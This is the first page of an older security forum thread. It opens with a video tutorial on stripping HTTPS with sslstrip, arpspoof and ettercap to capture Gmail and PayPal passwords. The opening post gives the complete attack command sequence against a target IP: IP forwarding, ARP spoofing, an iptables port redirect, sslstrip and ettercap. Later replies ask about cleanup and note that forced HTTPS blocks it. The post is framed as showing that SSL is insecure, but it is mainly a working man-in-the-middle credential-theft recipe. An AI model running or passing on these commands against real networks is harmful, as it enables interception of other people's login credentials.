Page 1 of 3 123 LastLast
Results 1 to 10 of 79

Thread: [Video] How to: Snifff SSL / HTTPS (sslstrip)

Hybrid View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Stripping SSL & Sniffing HTTPS (SSLStrip)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/2345515
    Download video: http://www.mediafire.com/?nbx8odfabbgf21j

    What is this?

    This video shows that with SSL encryption, it isn't secure. Proof of this is seen by showing a web based email (Google Mail) & online bank (PayPal) password.


    How does this work?
    > Performing a 'Man In The Middle' attack therefore all the traffic flows through the attacker.
    > Picks out HTTP traffic from port 80 and then packet redirection / forwarding onto a different port.
    > SSLStrip is then listening on that port and removes the SSL connection before passing it back to the user.
    > ettercap then picks out the username & password.


    What do I need?

    > sslstrip
    > arpspoof
    > ettercap
    *all in BackTrack 4 Pre Final*


    Network Setup:
    Targets IP: 192.168.1.6
    Gateway : 192.168.1.1


    Software
    Name: sslstrip
    Version: 0.2
    Home Page: http://www.thoughtcrime.org/software...rip/index.html
    Download Link: http://www.thoughtcrime.org/software...rip-0.2.tar.gz

    Name: arpspoof (DSniff)
    Version: 2.3
    Home Page: http://www.monkey.org/~dugsong/dsniff/
    Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

    Name: ettercap
    Version: 0.7.3
    Home Page: http://ettercap.sourceforge.net
    Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download


    Commands:
    Code:
    kate /etc/etter.conf
    >*uncomment redir_command_off in the iptables, linux section*
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    ettercap -T -q -i wlan0
    
    sslstrip -a -k -f
    ettercap -T -q -i wlan0
    Notes:
    You could save the packets instead, and then look through it later, in case ettercap doesn't pick up the information you need!

    Song: 16 Bit Lolitas - Nobody Seems To Care
    Video length: 03:55
    Capture length: 4:41

    Blog Post:http://g0tmi1k.blogspot.com/2009/07/...ssl-https.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1659-%5Bvideo%5D-how-snifff-ssl-https-sslstrip.html
    Last edited by g0tmi1k; 03-05-2011 at 04:15 PM.
    Have you...g0tmi1k?

  2. #2
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Thanks for posting the tutorial to the new forums, it's good to see you here.

    EDIT: Answer to the below: You're welcome, g0tmi1k!
    I deleted the warning since it is fixed now, there's no reason to leave it here.
    Last edited by Snayler; 02-28-2010 at 08:31 AM.

  3. #3
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by Snayler View Post
    Thanks for posting the tutorial to the new forums, it's good to see you here.
    The two following links are pointing to different places than what they announce. In your blog they're also like this.
    Hello!
    Thanks for the warm welcome! (=
    and another thanks for pointing that out!
    *updates and checks all posts*
    Have you...g0tmi1k?

  4. #4
    Junior Member
    Join Date
    Feb 2010
    Posts
    34

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Great Video thanks for sharing i marked this on my favorites..Great song..Whats the group of the song

  5. #5
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by Big_Mike View Post
    Great Video thanks for sharing i marked this on my favorites..Great song..Whats the group of the song
    Your welcome!
    The song info is posted in the video & the post... but here it is again.
    Song: 16 Bit Lolitas - Nobody Seems To Care
    Have you...g0tmi1k?

  6. #6
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    20

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Hi gotm1lk,

    what a great video. Well done. Could you come out with more tutorials? or you could point me to some other resources as well.

    Cheers~~

  7. #7

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    if you do it on your wired network yes

  8. #8
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    5

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Can anyone provide a "cleanup" routine for this?

    So the attacker system is in same state as before.

    Thanks
    Leroy

  9. #9
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    23

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    What exactly do you mean by a clean up? As far as I know, once you initiate sslstrip, youve basically authenticated ssh for the person connecting to whatever service they are getting to, once you are out of the picture, that connection is lost, the person would still have to re-authenticate with the server to get the SSL key they need in order to view the site

  10. #10
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    I had this working on gmail the other day.

    The problem with gmail is, EACH user has their own setting about HTTP
    use HTTP or FORCE HTTPS - If the user has "force" https, then sslstrip doesnt work.
    *or at least thats how I remember it*
    Have you...g0tmi1k?

Page 1 of 3 123 LastLast

Similar Threads

  1. Sickness - Password Sniffing with SSLStrip.
    By sickness in forum BackTrack Videos
    Replies: 35
    Last Post: 09-17-2010, 01:16 PM
  2. creating BT4 USB persistent video
    By jimmy in forum Beginners Forum
    Replies: 0
    Last Post: 02-12-2010, 11:45 PM
  3. sslstrip w/ My Wired-Wireless Network
    By MassAppeal in forum Beginners Forum
    Replies: 11
    Last Post: 02-11-2010, 05:56 AM
  4. Video Capture Software
    By sprouty in forum Beginners Forum
    Replies: 4
    Last Post: 01-25-2010, 11:16 AM
  5. sslstrip v0.7
    By Mr-Protocol in forum Tool Requests
    Replies: 2
    Last Post: 01-18-2010, 06:33 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •